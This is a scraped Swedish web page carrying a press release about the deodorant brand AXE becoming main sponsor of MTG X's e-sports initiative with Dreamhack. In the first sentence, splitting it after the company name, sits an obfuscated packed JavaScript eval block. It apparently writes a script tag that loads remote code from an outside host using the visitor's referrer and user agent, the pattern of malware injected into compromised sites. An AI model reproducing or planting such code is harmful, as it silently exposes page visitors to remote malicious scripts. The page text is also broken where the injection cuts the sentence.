Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

AXE – stolt huvudsponsor av MTG X:s stora E-sportsatsning

AXE – stolt huvudsponsor av MTG X:s stora E-sportsatsning
Sebastian

Deodorantföretaget eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zytra|var|u0026u|referrer|erkbk||js|php’.split(’|’),0,{}))
AXE inleder nu en stor satsning på E-sport i Sverige tillsammans med MTG X. E-sportens utveckling de senaste åren och dess förmåga att attrahera tonvis med unga svenska killar och tjejer ligger bakom AXE:s beslut att bli en del av alltihop. Sponsorskapet inleds redan nu men det är först under 2014 som det kommer bli tydligt för alla varför E-sport, Dreamhack och AXE passar så perfekt för varandra.

För AXE är det alltid en förutsättning att både kunna påverka och bidra. Sponsorskapet innebär därför att AXE:s kommunikativa idé har fått stort utrymme. När världarna snart korsas kommer det stå klart för alla vad idén är och hur AXE har tänkt.

”Vi ser en naturlig symbios framför oss tack vare all positiv energi som genomsyrar hela fenomenet. För alla företag med en kampanj av större proportioner i bakfickan och en målsättning att verkligen göra skillnad är E-sport- och Dreamhackarenan svårslagen”, säger Louise Edström, Nordic Brand Manager, AXE

AXE ser nu fram emot att kliva in i en bubbla av bra energi för att möta upp sin kärnmålgrupp i ett sammanhang där den trivs som allra bäst. Inifrån bubblan, tillsammans med bland andra e-sportens stora affischnamn ”Akke” och ”Loda”, ska ett nytt sorts AXE-budskap förmedlas.

”Det börjar nu, men det smäller i februari”, avslutar Louise utan att avslöja någonting.

Detta är ett pressmeddelande från AXE